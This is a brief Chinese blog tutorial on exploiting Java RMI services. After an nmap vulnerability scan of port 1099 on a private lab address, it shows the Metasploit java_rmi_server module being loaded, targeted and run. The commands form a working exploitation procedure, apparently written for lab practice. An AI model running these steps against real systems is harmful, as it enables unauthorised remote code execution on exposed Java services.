【教程】Java_Rmi漏洞利用

日期:2019-10-28 KING KALI 浏览:152次 评论:0条

Java_Rmi漏洞利用


Java RMI,即 远程方法调用(Remote Method Invocation),一种用于实现远程过程调用(RPC)(Remote procedure call)的Java API, 能直接传输序列化后的Java对象和分布式垃圾收集。它的实现依赖于Java虚拟机(JVM),因此它仅支持从一个JVM到另一个JVM的调用。(来源:简书)

1.扫描漏洞 

nmap --script=vuln -p 1099 192.168.84.128

2.选择exploit模块 

use exploit/multi/misc/java_rmi_server
3.设置靶机ip 
set rhosts 192.168.84.128
4.开始攻击  
exploit


本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】Java_Rmi漏洞利用
分享到:更多
标签: metasploit

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)